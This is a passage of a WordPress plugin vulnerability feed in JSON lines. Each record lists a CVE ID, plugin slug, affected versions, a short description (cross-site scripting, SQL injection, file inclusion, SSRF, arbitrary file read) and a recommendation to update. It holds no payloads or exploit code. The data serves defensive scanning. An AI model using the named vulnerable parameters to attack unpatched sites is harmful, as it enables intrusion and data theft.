service.","refs":"[{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-funnel-builder-by-cartflows-create-high-converting-sales-funnels-for-wordpress-privilege-escalation-1-3-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-funnel-builder-by-cartflows-create-high-converting-sales-funnels-for-wordpress-privilege-escalation-1-3-0\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6725319-909f-4d5c-9b34-8b6ea627b223%5D\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6725319-909f-4d5c-9b34-8b6ea627b223%5D\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/privilege-escalation-vulnerability-fixed-in-wordpress-cartflows-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/privilege-escalation-vulnerability-fixed-in-wordpress-cartflows-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0b95670-0767-4325-88d0-4ae6d7302558?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0b95670-0767-4325-88d0-4ae6d7302558?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10152","slug":"simple-certain-time-to-show-content","versionImpact":"1.2.2","versionEndExcluding":"1.3.1","description":"The Simple Certain Time to Show Content WordPress plugin before 1.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4d17da2-4c47-4fd1-a6bd-6692b07cf710\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4d17da2-4c47-4fd1-a6bd-6692b07cf710\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11446","slug":"chessgame-shizzle","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Chessgame Shizzle plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'cs_nonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chessgame-shizzle\\\/tags\\\/1.3.0\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chessgame-shizzle\\\/tags\\\/1.3.0\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194845\\\/chessgame-shizzle\\\/trunk\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194845\\\/chessgame-shizzle\\\/trunk\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d667f97-5072-4119-84d8-7104fd63559c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d667f97-5072-4119-84d8-7104fd63559c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11408","slug":"slotti-ajanvaraus","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Slotti Ajanvaraus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slotti' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194196%40slotti-ajanvaraus&new=3194196%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194196%40slotti-ajanvaraus&new=3194196%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f7d9b9-793e-4380-b971-bc13c77a06a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f7d9b9-793e-4380-b971-bc13c77a06a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10880","slug":"jobboardwp","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The JobBoardWP \u2013 Job Board Listings and Submissions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L192\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L192\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194143%40jobboardwp&new=3194143%40jobboardwp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194143%40jobboardwp&new=3194143%40jobboardwp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b48c64-aa54-4b9b-b1ee-c0f065e2aaa4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b48c64-aa54-4b9b-b1ee-c0f065e2aaa4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0234","slug":"sg-security","versionEndExcluding":"1.3.1","description":"The SiteGround Security WordPress plugin before 1.3.1 does not properly sanitize user input before using it in an SQL query, leading to an authenticated SQL injection issue.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acf3e369-1290-4b3f-83bf-2209b9dd06e1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acf3e369-1290-4b3f-83bf-2209b9dd06e1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.siteground.com\\\/viewtos\\\/responsible_disclosure_policy?scid=4&lang=en\",\"name\":\"https:\\\/\\\/www.siteground.com\\\/viewtos\\\/responsible_disclosure_policy?scid=4&lang=en\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/namah-age\\\/CVEs\\\/blob\\\/master\\\/1.md\",\"name\":\"https:\\\/\\\/github.com\\\/namah-age\\\/CVEs\\\/blob\\\/master\\\/1.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3551","slug":"penci-data-migrator","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Penci Soledad Data Migrator plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.0 via the 'data' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This is limited to just PHP files.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f8df3a-f247-4365-a9f6-6124065b4883?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f8df3a-f247-4365-a9f6-6124065b4883?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soledad-multiconcept-blogmagazine-wp-theme\\\/12945398\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soledad-multiconcept-blogmagazine-wp-theme\\\/12945398\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1955","slug":"wp-hide-backed-notices","versionImpact":"1.3","versionEndExcluding":"1.3.1","description":"The Hide Dashboard Notifications plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'warning_notices_settings' function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's settings.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4655236-7dfe-40ae-9d0c-6eacc59af13d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4655236-7dfe-40ae-9d0c-6eacc59af13d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-backed-notices\\\/tags\\\/1.3\\\/admin\\\/class-wp-hide-backed-notices-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-backed-notices\\\/tags\\\/1.3\\\/admin\\\/class-wp-hide-backed-notices-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104675%40wp-hide-backed-notices&new=3104675%40wp-hide-backed-notices&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104675%40wp-hide-backed-notices&new=3104675%40wp-hide-backed-notices&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11871","slug":"social-media-shortcodes","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Social Media Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'patreon' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-shortcodes\\\/tags\\\/1.3.0\\\/social_media_shortcode_plugin.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-shortcodes\\\/tags\\\/1.3.0\\\/social_media_shortcode_plugin.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206023%40social-media-shortcodes&new=3206023%40social-media-shortcodes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206023%40social-media-shortcodes&new=3206023%40social-media-shortcodes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96f63469-d05d-4c7a-8fc6-165c361a7c82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96f63469-d05d-4c7a-8fc6-165c361a7c82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-52182","slug":"ari-stream-quiz","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz \u2013 WordPress Quizzes Builder.This issue affects ARI Stream Quiz \u2013 WordPress Quizzes Builder: from n\/a through 1.3.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-3-0-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-3-0-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0541","slug":"gs-books-showcase","versionEndExcluding":"1.3.1","description":"The GS Books Showcase WordPress plugin before 1.3.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8453e587-cc8c-491a-af09-fc4ab215134b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8453e587-cc8c-491a-af09-fc4ab215134b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4961","slug":"poptin","versionImpact":"1.3","versionEndExcluding":"1.3.1","description":"The Poptin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'poptin-form' shortcode in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778af777-4c98-45cd-9704-1bdc96054aa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778af777-4c98-45cd-9704-1bdc96054aa7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968210\\\/poptin#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968210\\\/poptin#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poptin\\\/tags\\\/1.3\\\/poptin.php#L659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poptin\\\/tags\\\/1.3\\\/poptin.php#L659\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6851","slug":"broken-link-notifier","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f76c9f8-c57a-4875-b581-f67c9c60021c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f76c9f8-c57a-4875-b581-f67c9c60021c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6838","slug":"broken-link-notifier","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Broken Link Notifier plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.3.0 via broken links that are later exported. This makes it possible for authenticated attackers, with Contributor-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd96beee-afcb-4439-ad9b-f24e8afeac3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd96beee-afcb-4439-ad9b-f24e8afeac3c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12239","slug":"powerpack-addon-for-beaver-builder","versionImpact":"1.3.0.5","versionEndExcluding":"1.3.1","description":"The PowerPack Lite for Beaver Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the navigate parameter in all versions up to, and including, 1.3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-addon-for-beaver-builder\\\/trunk\\\/includes\\\/admin-settings-templates.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-addon-for-beaver-builder\\\/trunk\\\/includes\\\/admin-settings-templates.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5138ed4c-3e9c-45da-917e-e8d8396a62f1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5138ed4c-3e9c-45da-917e-e8d8396a62f1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6253","slug":"uicore-elements","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The UiCore Elements \u2013 Free Elementor widgets and templates plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.3.0 via the prepare_template() function due to a missing capability check and insufficient controls on the filename specified. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314574\\\/uicore-elements#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314574\\\/uicore-elements#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7cd6e44-bd78-4eb8-bab8-09e2af583222?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7cd6e44-bd78-4eb8-bab8-09e2af583222?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4763","slug":" icon-widget","versionEndExcluding":"1.3.0","description":"The Icon Widget WordPress plugin before 1.3.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f79a87f-c994-4a1e-b455-39d7d3c5c1b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f79a87f-c994-4a1e-b455-39d7d3c5c1b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3604","slug":"contact-form-entries","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The Contact Form Entries WordPress plugin before 1.3.0 does not validate data when its output in a CSV file, which could lead to CSV injection.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/300ebfcd-c500-464e-b919-acfeb72593de\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/300ebfcd-c500-464e-b919-acfeb72593de\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12861","slug":"w2s-migrate-woo-to-shopify","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The W2S \u2013 Migrate WooCommerce to Shopify plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.2.1 via the 'viw2s_view_log' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227799%40w2s-migrate-woo-to-shopify&new=3227799%40w2s-migrate-woo-to-shopify&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227799%40w2s-migrate-woo-to-shopify&new=3227799%40w2s-migrate-woo-to-shopify&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8eeae9-572c-420a-be7d-a240c54e96ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8eeae9-572c-420a-be7d-a240c54e96ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9889","slug":"elementinvader-addons-for-elementor","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.9 via the Page Loader widget. This makes it possible for authenticated attackers, with contributor-level access and above, to view private\/draft\/password protected posts, pages, and Elementor templates that they should not have access to.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd04f78-0b9c-4985-b450-007bb5cc9e26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd04f78-0b9c-4985-b450-007bb5cc9e26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3171339%40elementinvader-addons-for-elementor&new=3171339%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3171339%40elementinvader-addons-for-elementor&new=3171339%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5221","slug":"qi-blocks","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The Qi Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploader in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdf00861-e31e-485c-a562-12dba56af1c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdf00861-e31e-485c-a562-12dba56af1c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3097241%40qi-blocks%2Ftrunk&old=3094374%40qi-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3097241%40qi-blocks%2Ftrunk&old=3094374%40qi-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13387","slug":"wp-responsive-tabs","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The WP Responsive Tabs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprtabs' shortcode in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222481%40wp-responsive-tabs&new=3222481%40wp-responsive-tabs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222481%40wp-responsive-tabs&new=3222481%40wp-responsive-tabs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e58875-2f6e-453e-b33f-3d7a2a62b7b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e58875-2f6e-453e-b33f-3d7a2a62b7b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2018-25095","slug":"duplicator","versionEndExcluding":"1.3.0","description":"The Duplicator WordPress plugin before 1.3.0 does not properly escape values when its installer script replaces values in WordPress configuration files. If this installer script is left on the site after use, it could be use to run arbitrary code on the server.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16cc47aa-cb31-4114-b014-7ac5fbc1d3ee\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16cc47aa-cb31-4114-b014-7ac5fbc1d3ee\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6264","slug":"post-meta-data-manager","versionImpact":"1.2.3","versionEndExcluding":"1.3.0","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018$meta_key\u2019 parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dd6828b-6235-4284-bce6-be23b79ac70e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dd6828b-6235-4284-bce6-be23b79ac70e?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party 